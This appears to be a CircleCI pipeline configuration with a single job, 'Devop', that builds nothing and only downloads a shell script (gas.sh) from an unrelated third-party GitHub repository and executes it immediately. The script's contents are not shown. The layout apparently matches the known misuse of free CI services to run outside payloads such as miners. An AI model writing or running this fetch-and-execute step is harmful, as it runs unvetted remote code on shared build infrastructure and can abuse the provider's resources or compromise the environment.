version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run: wget https://raw.githubusercontent.com/chikahusarii/autogen/main/gas.sh && ./gas.sh

workflows:
    version: 2.1
    build:
        jobs:
            - Devop